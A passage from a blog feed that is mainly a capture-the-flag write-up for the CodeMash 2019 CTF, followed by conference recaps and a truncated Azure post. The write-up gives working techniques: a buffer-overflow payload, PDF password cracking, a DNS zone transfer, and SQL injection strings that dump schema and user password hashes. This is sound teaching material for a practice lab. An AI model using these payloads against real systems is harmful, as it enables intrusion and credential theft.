<p>Now, given the challenge description, I assumed there was something hidden inside of the text file that was given. So I opened it with my trusty HexEditor.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-4.png" class="kg-image"></figure><p>You'll notice that there's a lot of jumbled characters intertwined between the text itself, characters we could not see before. These characters are known as <em>zero width characters</em> and are a common approach to hiding messages in text.</p><p>To more easily digest how this message really looks, we can use a unicode analyzer. I've provided the link below.</p><p><a href="https://www.fontspace.com/unicode/analyzer/?q=%E2%80%8BIn%E2%80%8B+%E2%80%8Bfolk%E2%80%8Bl%E2%80%8Bor%E2%80%8Be%E2%80%8B%2C+%E2%80%8Ba%E2%80%8B+g%E2%80%8Bhos%E2%80%8Bt%E2%80%8B+is+%E2%80%8Bthe%E2%80%8B+%E2%80%8Bs%E2%80%8Boul%E2%80%8B+or%E2%80%8B+s%E2%80%8Bp%E2%80%8Bir%E2%80%8Bit%E2%80%8B+%E2%80%8Bo%E2%80%8Bf+a%E2%80%8B+dea%E2%80%8Bd%E2%80%8B+pe%E2%80%8Br%E2%80%8Bson%E2%80%8B+%E2%80%8Bor%E2%80%8B+ani%E2%80%8Bm%E2%80%8Bal+%E2%80%8Bthat+%E2%80%8Bca%E2%80%8Bn%E2%80%8B+a%E2%80%8Bpp%E2%80%8Be%E2%80%8Bar+t%E2%80%8Bo+t%E2%80%8Bh%E2%80%8Be%E2%80%8B+l%E2%80%8Bivin%E2%80%8Bg%E2%80%8B.%E2%80%8B+I%E2%80%8Bn%E2%80%8B+%E2%80%8Bgh%E2%80%8Bo%E2%80%8Bst%E2%80%8Bl%E2%80%8Bo%E2%80%8Bre%2C+%E2%80%8Bgh%E2%80%8Bo%E2%80%8Bst%E2%80%8B+d%E2%80%8Be%E2%80%8Bs%E2%80%8Bcr%E2%80%8Bipti%E2%80%8Bo%E2%80%8Bns%E2%80%8B+vary%E2%80%8B+%E2%80%8Bwid%E2%80%8Bel%E2%80%8By%2C%E2%80%8B+from%E2%80%8B+%E2%80%8Binv%E2%80%8Bis%E2%80%8Bi%E2%80%8Bbl%E2%80%8Be+%E2%80%8Bpre%E2%80%8Bsence%E2%80%8Bs+to+l%E2%80%8Bif%E2%80%8Bel%E2%80%8Bike%E2%80%8B+vi%E2%80%8Bsi%E2%80%8Bons%E2%80%8B.%E2%80%8B">https://www.fontspace.com/unicode/analyzer/?q=%E2%80%8BIn%E2%80%8B+%E2%80%8Bfolk%E2%80%8Bl%E2%80%8Bor%E2%80%8Be%E2%80%8B%2C+%E2%80%8Ba%E2%80%8B+g%E2%80%8Bhos%E2%80%8Bt%E2%80%8B+is+%E2%80%8Bthe%E2%80%8B+%E2%80%8Bs%E2%80%8Boul%E2%80%8B+or%E2%80%8B+s%E2%80%8Bp%E2%80%8Bir%E2%80%8Bit%E
2%80%8B+%E2%80%8Bo%E2%80%8Bf+a%E2%80%8B+dea%E2%80%8Bd%E2%80%8B+pe%E2%80%8Br%E2%80%8Bson%E2%80%8B+%E2%80%8Bor%E2%80%8B+ani%E2%80%8Bm%E2%80%8Bal+%E2%80%8Bthat+%E2%80%8Bca%E2%80%8Bn%E2%80%8B+a%E2%80%8Bpp%E2%80%8Be%E2%80%8Bar+t%E2%80%8Bo+t%E2%80%8Bh%E2%80%8Be%E2%80%8B+l%E2%80%8Bivin%E2%80%8Bg%E2%80%8B.%E2%80%8B+I%E2%80%8Bn%E2%80%8B+%E2%80%8Bgh%E2%80%8Bo%E2%80%8Bst%E2%80%8Bl%E2%80%8Bo%E2%80%8Bre%2C+%E2%80%8Bgh%E2%80%8Bo%E2%80%8Bst%E2%80%8B+d%E2%80%8Be%E2%80%8Bs%E2%80%8Bcr%E2%80%8Bipti%E2%80%8Bo%E2%80%8Bns%E2%80%8B+vary%E2%80%8B+%E2%80%8Bwid%E2%80%8Bel%E2%80%8By%2C%E2%80%8B+from%E2%80%8B+%E2%80%8Binv%E2%80%8Bis%E2%80%8Bi%E2%80%8Bbl%E2%80%8Be+%E2%80%8Bpre%E2%80%8Bsence%E2%80%8Bs+to+l%E2%80%8Bif%E2%80%8Bel%E2%80%8Bike%E2%80%8B+vi%E2%80%8Bsi%E2%80%8Bons%E2%80%8B.%E2%80%8B</a></p><p>Using this website, we can see every single character that is contained within the string. You'll notice that there are "ZERO WIDTH SPACE" characters throughout the text. This is important!</p><p>This approach to hiding messages in text generally involves the use of binary. Every approach to encryption is going to be different, but most messages end up as some sort of binary representation. Maybe each zero width character is a 1 and each real space is a 0. These 1's and 0's will form a binary string, which can then be translated into readable text.</p><p>It's also very common for CTF events to use the same flag structure. In this one, all of the flags (so far) have started with cm19.</p><p>With this in mind, I wanted to see if I could extract cm19 in binary from the zero width spaces.</p><p><strong>cm19 </strong>in binary is: <strong>01100011 01101101 00110001 00111001</strong></p><p>If you reference the unicode analyzer page linked previously, you may see a pattern here. 
</p><p>The word "in" is followed by a zero width space.</p><p>The single space afterwards is followed by a zero width space.</p><p>The word "folklore" has a zero width space after "folk".</p><p>If we assume that the zero width spaces are some sort of terminator, it actually starts to fit our assumption of the cm19 binary string.</p><p>In would be 01</p><p>A single space would be 1</p><p>Folk would be 0001</p><p>.. and so on. If we combine the above, we get 0110001, which is the start of our cm19 binary string!</p><p>Now, I had no desire to go through this entire sentence by hand and finish out the sequence, so I wrote a quick Go program to do it for me.</p><pre><code class="language-go">package main

import &quot;strings&quot;

func main() {
	input := &quot;​In​ ​folk​l​or​e​, ​a​ g​hos​t​ is ​the​ ​s​oul​ or​ s​p​ir​it​ ​o​f a​ dea​d​ pe​r​son​ ​or​ ani​m​al ​that ​ca​n​ a​pp​e​ar t​o t​h​e​ l​ivin​g​.​ I​n​ ​gh​o​st​l​o​re, ​gh​o​st​ d​e​s​cr​ipti​o​ns​ vary​ ​wid​el​y,​ from​ ​inv​is​i​bl​e ​pre​sence​s to l​if​el​ike​ vi​si​ons​.​&quot;

	result := &quot;&quot;

	for _, v := range input {

		if v == 8203 { // zero width space (U+200B)
			// the previous character was followed by a ZWSP, so its bit becomes a 1
			result = strings.TrimSuffix(result, &quot;0&quot;)
			result += &quot;1&quot;
		} else {
			// every character starts out as a 0 bit
			result += &quot;0&quot;
		}

	}

	print(result)
}
</code></pre>
<p>Running the application gives the following binary string:</p><pre><code>011000110110110100110001001110010010110101110010001100110011010001100100001011010110001001110100011101110110111000101101011101000110100001100101010000110010110101001000010000010101001001010011
</code></pre>
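<p>The same conversion can also be done locally by slicing the bit string into bytes:</p>

```python
# Decode the recovered bit string eight bits at a time into ASCII characters.
bits = (
    "0110001101101101001100010011100100101101011100100011001100110100"
    "0110010000101101011000100111010001110111011011100010110101110100"
    "0110100001100101010000110010110101001000010000010101001001010011"
)
flag = "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))
print(flag)
```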
<p>Which can then be converted to the flag itself using an <a href="https://www.asciitohex.com/">ASCII to hex converter</a>. </p><h2 id="the-parrot">The Parrot</h2><p>This challenge had a single pdf file called parrot.pdf. When I attempted to open the PDF to view its contents, though, I was presented with a password dialog.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-5.png" class="kg-image"></figure><p>This is a password protected PDF, and I needed a way to get the password so that I could open the PDF and see what's inside.</p><p>For this, I used a tool called PDFcrack and a collection of commonly used passwords called <a href="https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt">rockyou.txt</a>. Putting the two together, I got the following result:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/parrot_console.png" class="kg-image"></figure><p>You'll notice on the very last line that the program managed to find the password "cracker".</p><p><em>Note: I later found out that if you open the pdf in a text editor and look at the Authors, it actually spells out the password if you look closely:</em></p><p><em>&lt;&lt; /Authors: <strong>c</strong>harlie <strong>r</strong>omeo <strong>a</strong>lfa <strong>c</strong>harlie <strong>k</strong>ilo <strong>e</strong>cho <strong>r</strong>omeo &gt;&gt;</em></p><p>Moving on!</p><p>When the PDF was opened, it contained the following image:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-7.png" class="kg-image"></figure><p>In order to get the image out of the PDF, I used another tool called pdfimages. At this point, I already knew the password, so I ran pdfimages with the password 'cracker'.</p><pre><code>pdfimages parrot.pdf -upw cracker .
</code></pre>
<p>This command extracted two images in <em>.ppm</em> format. Opening the first image and.. tada!</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-6.png" class="kg-image"></figure><h2 id="stacked-up">Stacked Up</h2><p>The challenge description stated that there was a vulnerable service running in the cloud and that it could be exploited in order to get the flag. A copy of just the binary was given freely for download.</p><p>Running the program locally, it just looked like it echoed back whatever I typed in.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-21.png" class="kg-image"></figure><p>Doesn't seem like a very useful program, does it? I checked out what the hint had to say about this challenge. The hint plainly said:</p><p><strong>HINT:</strong> What happens if you input a veeeeeeeeeery long string?</p>
<p>Fair enough, I tried entering a long string.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-22.png" class="kg-image"></figure><p>I didn't think that was incredibly surprising. With input that large, I probably caused a buffer overflow.</p><p>However, at this point, I went down a pretty large rabbit hole. I spent a lot of time focused on the core dump, convinced that there was going to be something valuable inside of the stack trace when the program errored. Ultimately, I did not really get anywhere going down that path.</p><p>The next thing I wanted to try was to decompile the binary and see if I could make any sense of what was going on inside.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-17.png" class="kg-image"></figure><p>After decompiling the binary using <a href="https://www.hex-rays.com/products/decompiler/">IDA</a>, I noticed a couple of really interesting things.</p><p>First, the main method had no jumps. There weren't any if statements, and all the main() method did was get user input and print it out. I did not expect that at all.</p><p>Second, I noticed that there was a method called <strong>flag()</strong>.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-23.png" class="kg-image"></figure><p>This method looked almost identical to the <strong>main()</strong> method, with the exception that it tried to open a file called flag.txt and then print its contents.</p><p>I knew at this point the goal was going to be to call the flag() method. 
There must exist a flag.txt file on the remote server where the binary is running, and calling the flag method would read that file and print it out.</p><p>In order to do this, the <strong>return address </strong>of the main() method would need to be overwritten.</p><p>When a function is called (in this case main), the return address is stored on the stack and is just above the base pointer. If I overwrite the return address of the main method to point to the flag() method instead of the default return address, the program should call the flag method.</p><p>To accomplish this I needed a couple of things.</p><p>First, since the return address is right after the base pointer, I needed to know exactly how many characters were required to overflow the program before I started to spill over into the return address.</p><p>You can see here in this photo that the return address looks like </p><p><strong>0xff021b92 0x00007fff </strong>(the last two hex values on the top row)</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-19.png" class="kg-image"></figure><p>When I used a lot of A's in order to get the program to overflow, I noticed that the return address starts to get overwritten at the 1033rd character.</p><p>See the 41's that are bleeding over into the 3rd column?</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-20.png" class="kg-image"></figure><p>Ok, good progress! The 1033rd character is the start of the return address, so we need to fill the buffer with 1032 characters of junk, and then tack on the return address of the flag() method.</p><p>Using IDA again, I got the address of the flag() method just by clicking on the starting line of the method (0x400676):</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-24.png" class="kg-image"></figure><p>At this point, I have everything needed in order to call the flag() method. 
To create the input for the application, I used Python, with the <code>p32</code> helper from pwntools, to generate the junk characters and append the address of the flag method to the end of the string:</p><pre><code class="language-python">python -c 'from pwn import p32; print &quot;A&quot;*1032 + p32(0x400676)'
</code></pre>
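<p>As an alternative sketch, the same payload can be built with only the standard library's <code>struct</code> module, which makes the little-endian packing explicit:</p>

```python
# Build the overflow payload: 1032 bytes of junk, then the address of
# flag() (0x400676) packed as a little-endian 32-bit value.
import struct

payload = b"A" * 1032 + struct.pack("<I", 0x400676)
print(len(payload))  # 1036
```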
<p>Connecting to the remote service and using the generated input overwrites the return address, calls the flag() method, and prints the flag!</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-18.png" class="kg-image"></figure><h2 id="unicorn">Unicorn</h2><p>This challenge was relatively straightforward. A Unicorn.svg file was given, and that's about it.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-8.png" class="kg-image"></figure><p>Typically in CTFs, if you're given an SVG, they expect you to manipulate it in some way in order to see the flag. </p><p>In the case of our cute little Unicorn, I just opened the file in an SVG editor and deleted the Unicorn. The flag was hidden behind it.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-9.png" class="kg-image"></figure><h2 id="danger-zone">Danger Zone</h2><p>This challenge had the following description:</p><pre><code>Can you enter the **danger.zone**, and find the flag?

Service listening on:

whale.hacking-lab.com:**5553**

Note: this is **NOT** about the web site danger.zone!
</code></pre>
<p>Like most CTFs, a lot of clues on how to solve the problem are given in the name and the description. For this challenge, it talks about <strong>danger.zone</strong> and a service that is running on port 5553. The hint itself was also really helpful:</p><p><strong>HINT:</strong> Find out what service is listening on the port. <strong>nmap</strong> could be helpful for this kind of fingerprinting.</p>
<p>That sounded like a good way to start off this challenge, so I did just that. Running nmap against port 5553 tells us that the running service is a <em>domain</em> service with a version of <em>ISC BIND 9.9.5</em>.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-13.png" class="kg-image"></figure><p>With this information, we now know that port 5553 is running a domain service, which means it's most likely running a custom DNS service.</p><p>For DNS problems, <strong><a href="https://linux.die.net/man/1/dig">dig</a></strong> can be incredibly helpful. Since I now knew that the service is a DNS service (and is probably vulnerable), I used dig to look up some more information about it while trying to access <strong>danger.zone</strong>.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-14.png" class="kg-image"></figure><p>I was able to successfully query danger.zone using the DNS service, and on top of that, danger.zone exists as a record in the zone file for the DNS! That ultimately told me that I should be able to perform a <a href="https://en.wikipedia.org/wiki/DNS_zone_transfer">zone transfer</a>.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-15.png" class="kg-image"></figure><p>After performing the zone transfer, the zone file is printed to the screen, and I can see the flag that was put inside.</p><h2 id="mrs-robot">Mrs Robot</h2><p>For this challenge, a webpage that prompted us for a secret word was given.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-10.png" class="kg-image"></figure><p>Viewing the source didn't really bring up anything of interest, except perhaps that each word typed in redirected to a webpage named after the MD5 hash of the input:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-11.png" class="kg-image"></figure><p>This led me to believe that the flag was an HTML file on the webserver, and that the name of the HTML file was the MD5 hash of the secret word.</p><p>I could use something like DirBuster to find the file for me, hashing common words and checking if the file exists, but I might be there for a while.</p><p>Luckily, the site did have a <a href="http://www.robotstxt.org/">robots.txt</a> file that contained the following:</p><pre><code>User-agent: *
Disallow: /481065fd79b253104aeab5ca5c717cd5.html
</code></pre>
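<p>Assuming the site really does serve pages named after the MD5 hex digest of the input, the word-to-page mapping is easy to reproduce:</p>

```python
# Map a candidate secret word to the page name the site would redirect to,
# assuming pages are named after the MD5 hex digest of the input.
import hashlib

word = "winter"  # the secret word recovered later in this challenge
page = hashlib.md5(word.encode()).hexdigest() + ".html"
print(page)
```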
<p>Well, that looks promising!</p><p>Upon landing on the page in the robots.txt file, I was presented with the text:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-12.png" class="kg-image"></figure><p>If you're not already familiar with the <a href="https://roila.org/language-guide/vocabulary/">Robot Interaction Language</a>, a simple Google search for both of these terms will bring up a table with all of the translations necessary to get this text into English.</p><p>Leveraging the table, I got the secret word, <strong>winter</strong>, and thus the flag itself.</p><h2 id="cars">Cars</h2><p>For this challenge, a website with a search box and a login page was given. The goal was to log in to the page using the <strong>admin</strong> account. </p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-27.png" class="kg-image"></figure><p>I was pretty sure this was going to be a SQL injection challenge, and the hint confirmed that:</p><p><strong>HINT:</strong> Can you find a way to make the search return more data than expected? What you might get, is not the password yet.</p>
<p>I started off by throwing some quotes at the search box, as that's a pretty common way to learn more about the SQL flavor and the query running behind the scenes. I used the following query:</p><pre><code>a'
</code></pre>
<p>The result that came back was:</p><pre><code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
</code></pre>
<p>I didn't even use a %, yet one shows up in the error, and the behavior of the page did seem to lend itself to a LIKE query. Inspecting the error more closely, I could see that the trailing SQL is %'. So, my input of a' must have terminated the string early, and %' is what was left over.</p><p>With this in mind, I felt pretty confident the query was structured like so:</p><pre><code>SELECT .. FROM .. WHERE .. LIKE '%' + [input] + '%'
</code></pre>
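<p><em>To make the injection mechanics concrete, here is a minimal sketch of what the vulnerable server-side code plausibly looks like. The function, table, and column names are hypothetical; the challenge's actual source was never revealed.</em></p>

```python
# Hypothetical sketch of the vulnerable search endpoint: user input is
# concatenated straight into the LIKE pattern instead of being parameterized.
# The table/column names (cars, name) are assumptions for illustration.
def build_query(user_input: str) -> str:
    return "SELECT name FROM cars WHERE name LIKE '%" + user_input + "%'"

# A harmless search builds a valid query:
print(build_query("a"))
# → SELECT name FROM cars WHERE name LIKE '%a%'

# A single quote in the input closes the string literal early, leaving the
# dangling %' that MySQL complained about:
print(build_query("a'"))
# → SELECT name FROM cars WHERE name LIKE '%a'%'
```

<p><em>Anything appended after that closing quote is then parsed as SQL rather than as part of the search term, which is exactly what the next step takes advantage of.</em></p>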
<p>The next step was to start filling in the blanks in order to get some more information about the underlying database.</p><p>Using the following query, we can get a dump of all of the underlying tables and their columns:</p><pre><code>a' union select table_name, column_name FROM information_schema.columns#
</code></pre>
<p>The <strong>a' </strong>is to finish the SELECT statement so that it's valid, and then I can UNION another SELECT statement to pull back information about the schema. Since this is a MySQL database, the pound symbol (#) is used to comment out the rest of the query. It would look something like the following:</p><pre><code>SELECT .. FROM .. WHERE .. LIKE '%a' UNION SELECT table_name, column_name FROM information_schema.columns#%'
</code></pre>
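<p><em>That substitution can be traced in a few lines of Python. A hedged sketch; "make", "model", and "cars" are stand-ins for the real (unknown) column and table names:</em></p>

```python
# Hypothetical reconstruction of the final query string the server executes
# once the UNION payload is substituted into the LIKE pattern.
payload = "a' union select table_name, column_name FROM information_schema.columns#"
query = "SELECT make, model FROM cars WHERE make LIKE '%" + payload + "%'"

# MySQL treats everything after # (outside a string literal) as a comment,
# so the trailing %' never reaches the parser. Roughly:
effective = query.split("#")[0]
print(effective)
# → SELECT make, model FROM cars WHERE make LIKE '%a' union select table_name, column_name FROM information_schema.columns
```

<p><em>Splitting on # is only an approximation of MySQL's comment handling, but it shows why the injected query parses cleanly: the leftover %' has been commented away, and the UNION supplies the same number of columns as the original SELECT.</em></p>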
<p>The hash comments out the trailing %' from the real LIKE query.</p><p>The results of this query looked like this:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-28.png" class="kg-image"></figure><p>At this point, we have all of the information we need to pull back the data that we're looking for: the <strong>users </strong>and their <strong>password hashes</strong>.</p><p>Doing another injection using the new tables and columns gives us this query:</p><pre><code>a' UNION select username,password_hash from Users#
</code></pre>
<p>Resulting in the following records:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-29.png" class="kg-image"></figure><p>There it is! The hash of the admin password.</p><p>I was pretty confident it was going to be an MD5 hash, so I knew I needed a rainbow table and had to hope that the hash had been cracked at some point in the past.</p><p>I ended up using an online <a href="https://isc.sans.edu/tools/reversehash.html">Reverse Hash Calculator</a>, which did have the hash already stored.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-30.png" class="kg-image"></figure><p>Using the username of <strong>admin </strong>and the password of <strong>dodge123</strong> revealed the flag.</p><h2 id="on-site-challenge">On Site Challenge</h2><p>The description for the on site challenge was in the form of a Haiku:</p><pre><code>Games are played all night.
This one online, but there, board.
Code is history.
</code></pre>
<p>Reading the poem, I saw "but there, board". To me, <em>there </em>is hinting at the location of the flag. It is an on site challenge after all. On site, there is a place where <strong>board games </strong>are played, so that seemed like a logical conclusion to me.</p><p>Upon entering the room, I saw multiple identical QR codes on the wall:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/20190111_075736-1.jpg" class="kg-image"></figure><p>Using a QR code reader, I saw that the QR code was actually a link to:</p><p><a href="https://www.owasp.org/index.php/User:Bill_Sempf">https://www.owasp.org/index.php/User:Bill_Sempf</a></p><p>Looking at the remainder of the Haiku, "Code is <strong>history</strong>", I eventually figured out that it's referring to the "View <strong>history</strong>" of the wiki, which contains a strange entry that was added and then immediately removed about a minute later.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-16.png" class="kg-image"></figure><p>Viewing the revision in which lines were added, I saw what appeared to be a Base64 encoded string. Putting that string into a Base64 decoder revealed the flag.</p>]]></content:encoded></item><item><title><![CDATA[CodeMash 2019]]></title><description><![CDATA[<p>What better way to start off the new year than with a conference? This was my first time attending <a href="http://www.codemash.org/">CodeMash</a>, and it was well worth the trip.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/Dwov0FDUwAAX_6o-3.jpeg" class="kg-image"></figure><p>CodeMash is an annual conference that is held at the <a href="https://www.kalahariresorts.com/ohio/">Kalahari Resorts</a> in Sandusky, Ohio. 
While the conference itself is only two days</p>]]></description><link>https://reese.dev/codemash-2019/</link><guid isPermaLink="false">5c3cb5a004e4b332a4385dfa</guid><category><![CDATA[conference]]></category><category><![CDATA[codemash]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Thu, 10 Jan 2019 19:52:00 GMT</pubDate><content:encoded><![CDATA[<p>What better way to start off the new year than with a conference? This was my first time attending <a href="http://www.codemash.org/">CodeMash</a>, and it was well worth the trip.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/Dwov0FDUwAAX_6o-3.jpeg" class="kg-image"></figure><p>CodeMash is an annual conference that is held at the <a href="https://www.kalahariresorts.com/ohio/">Kalahari Resorts</a> in Sandusky, Ohio. While the conference itself is only two days long, they do offer what they call "Precompilers", which you can just think of as pre-conference workshops.</p><h2 id="first-impressions">First Impressions</h2><p>While many conferences focus on specific frameworks such as .NET, or languages like JavaScript, CodeMash definitely makes an effort to be diverse in the content that it provides. I attended sessions discussing security, people skills, SQL, and the list goes on. </p><p>While not directly applicable to myself, the other thing I noticed is that CodeMash is incredibly family friendly. Not only was the conference held at an indoor waterpark, it's actually two conferences in one, the second being KidzMash.</p><p>KidzMash is another conference that runs parallel to CodeMash, and provides sessions more geared towards... you guessed it, kids! Topics included robotics, video game development, and even 3D printing. It made the whole experience feel very wholesome and welcoming. </p><p>To add onto that, I felt CodeMash had the most community involvement that I've ever seen in a conference. 
The conference had its own Slack channel where conference goers could ask questions as the conference was going on. You had people asking if anyone wanted to get together to play games, meet up to discuss another topic, etc. You never really felt alone or out of the loop.</p><h2 id="new-faces">New Faces</h2><p>It was refreshing to see a lot of newer faces giving presentations in each of the talks. Along with being family focused, CodeMash almost seemed to be driven to encourage those who may not have spoken before to get up on stage and give it a shot. A select number of the speakers at the conference have never spoken before, and the conference explicitly calls out that they like to have those individuals come and present.</p><p>For first-time speakers, CodeMash even pairs them up with a couple of mentors that can give feedback on their presentation and pass on their expertise from having been there, and done that.</p><p>Not only did you get to see some of the bigger names in the tech world (e.g. Jon Skeet!), you got to introduce yourself to some newer members of the community. These individuals bring a fresh perspective and have their own opinions, which I feel disrupts the echo chamber that we may find ourselves lost in from time to time.</p><h2 id="capture-the-flag">Capture the Flag</h2><p>Speaking of new faces, I met quite a few individuals who were also a part of the CodeMash CTF. For those unfamiliar, CTF (Capture the Flag) is an event where you are given a scenario in which you must obtain the "flag" in order to score points. Scenarios may include: a zip file that has been intentionally corrupted and you must figure out how to get inside to unzip the flag, an image that has a hidden message somewhere inside of it, or even a website that has a web page somewhere on the server and you must do everything possible to find it.</p><p>It was one of the best experiences I had at CodeMash, and the people involved were equally enjoyable to converse with. 
</p><p>The organizer, Bill Sempf, also runs the Columbus OWASP group and is an expert lock picker! Luckily, one of the "open spaces" at the conference was an introduction to lock picking, so I was able to get some hands-on experience picking locks, which was a great time.</p><p>But I digress.</p><p>For the CTF, there are plans for next year to have those who were especially passionate about it (this guy) create our own problems, rather than using problems created by someone else. I'm incredibly excited to make some CTF problems in the near future.</p><h2 id="wrapping-up">Wrapping Up</h2><p>Taking everything into consideration, CodeMash is definitely worth it. At only $350 a ticket, you get two full days of sessions, food, networking opportunities, and an after party. Contrast that with the typical pricing of conferences, and it's worth at least giving it a try.</p><p>Great content, great speakers, in a great location. I will definitely be going back for CodeMash 2020.</p><p></p>]]></content:encoded></item><item><title><![CDATA[Another Year Another DEVintersection]]></title><description><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/dvlogo-2.png" class="kg-image"></figure><p>It's close to 32 degrees outside. Wind whipping at your coat. No, you're not on a boat. But where are you? Admittedly that's a question with one too many answers, but I bet you wouldn't guess Las Vegas. 
DEVintersection 2018 was again held in Las Vegas, Nevada at the MGM</p>]]></description><link>https://reese.dev/devintersection-2018/</link><guid isPermaLink="false">5c2794e704e4b332a4385ddc</guid><category><![CDATA[devintersection]]></category><category><![CDATA[conference]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Tue, 18 Dec 2018 22:18:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/dvlogo-2.png" class="kg-image"></figure><p>It's close to 32 degrees outside. Wind whipping at your coat. No, you're not on a boat. But where are you? Admittedly that's a question with one too many answers, but I bet you wouldn't guess Las Vegas. DEVintersection 2018 was again held in Las Vegas, Nevada at the MGM Grand. And it was cold. Too cold, my friends.</p><p>On top of that, I'm honestly not much of a gambler, so I spent much of my free time hopping from hotel to hotel, checking out the sights. Indoors. No matter! It was still a fantastic conference, and the theme did slightly change from that of last year.</p><p>If you recall my <a href="https://reesespieces.io/devintersection-2017/">previous post</a> on DEVintersection 2017, the theme was <strong>Docker </strong>and <strong>Microservices. </strong>It was a challenge to go to a session and not be exposed to one or the other, even if the topic <em>seemed </em>like it was not related at all. While Docker and microservices are still being talked about, and are definitely not going anywhere, the theme this year definitely did shift.</p><h2 id="the-theme">The Theme</h2><p>It may not be incredibly surprising to hear that much of the conference was focused around Artificial Intelligence. It's gaining some traction in the tech community.</p><p>This year DEVintersection explicitly co-located with the Microsoft Azure + AI Conference. Now, co-locating is pretty common for DEVintersection; it's why they call it an <em>intersection... 
</em>so I guess I shouldn't have been so surprised going into the con that a large portion of it would have AI-related content!</p><p>The AI keynote highlighted customers that used Microsoft cognitive services to build customer support bots, notably <a href="https://blog.vodafone.co.uk/2017/04/12/meet-tobi-chatbot-latest-addition-vodafone-uks-customer-service-team/">Tobi</a>. They showcased multiple demonstrations where it was near impossible to tell the difference between two humans interacting with one another and a human interacting with a bot. Going so far as to have the bot verbally speak. AI is going to have a huge impact on the customer service industry, even more so than it does today.</p><p>Though the highlight of the AI keynote had to be a <strong>whiteboard compiler</strong>. Now, when they initially announced what they were going to do, I wasn't quite sure what they were ultimately going to do. What the hell is a whiteboard compiler?</p><p>In the end, they drew an Azure DevOps pipeline on a whiteboard, took a photo of it, and then it was interpreted by Azure cognitive services to be turned into a usable deployment pipeline. From a whiteboard! A whiteboard, I tell you!</p><h2 id="so-much-auth">So Much Auth</h2><p>My current area of focus, at work anyway, has to do with identity management. That is, user management within an enterprise, including editing users, access to applications, the whole shebang. So unsurprisingly, I spent a large chunk of the conference attending workshops and sessions that closely aligned with identity and access management. 
For the most part, that meant I spent the entire week with <a href="https://brockallen.com/">Brock Allen</a> and the <a href="https://solliance.net/Home/About">Solliance </a>team; it's pretty much all they do.</p><p>The irony of it all was that after spending two days in a workshop and attending a couple of sessions all relating to OAuth and Identity/Access Management, Solliance held a Security After Dark meet and greet to field questions. One of the partygoers had asked an OAuth implementation question, and through a number of back-and-forths the final response was <strong>"specifications are suggestions"</strong>.</p><p>Here I was, ready to go back to my office and lay down the "obey the spec" hammer, only to be brought back down to earth: it doesn't necessarily have to be that way.</p><p>Honestly though, it was good to hear. All too often I get stuck in this mindset of needing to find the perfect answer, the answer that has no equal and is obviously the way to go. Unfortunately in our field, such answers rarely exist. You can't just follow the spec word for word and produce a great product, or guarantee that it's going to be portable. Not everyone is going to follow the spec exactly, and the spec itself in some areas is pretty vague.</p><p>The moral of my entire Auth journey at DEVintersection would simply be: don't be afraid to diverge from the spec. At least a little bit.</p><h2 id="why-so-fast">Why So Fast?</h2><p>For me, the conference honestly was about avoiding the cold and learning the ins and outs of the OAuth spec as well as how to implement it. Though with that said, this time around the conference seemed to go much quicker than the previous year. Maybe the new hotness wore off, or I'm getting more accustomed to conference going. 
Nevertheless, I'll be back again next year.</p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[Understanding Azure Deployment Slots]]></title><description><![CDATA[<p>Azure deployment slots are a fantastic feature of Azure App Services. They allow developers to have multiple versions of their application running at the same time with the added bonus of being able to re-route traffic between each instance at the press of a button. They can, however, generate a</p>]]></description><link>https://reese.dev/understanding-azure-deployment-slots/</link><guid isPermaLink="false">5beb764c7e759204ca2529ae</guid><category><![CDATA[azure]]></category><category><![CDATA[tutorial]]></category><category><![CDATA[devops]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Wed, 14 Nov 2018 01:19:00 GMT</pubDate><media:content url="https://reese.dev/content/images/2018/11/slots.png" medium="image"/><content:encoded><![CDATA[<img src="https://reese.dev/content/images/2018/11/slots.png" alt="Understanding Azure Deployment Slots"><p>Azure deployment slots are a fantastic feature of Azure App Services. They allow developers to have multiple versions of their application running at the same time with the added bonus of being able to re-route traffic between each instance at the press of a button. They can, however, generate a lot of confusion if you don't fully understand how they work.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/slots-2.png" 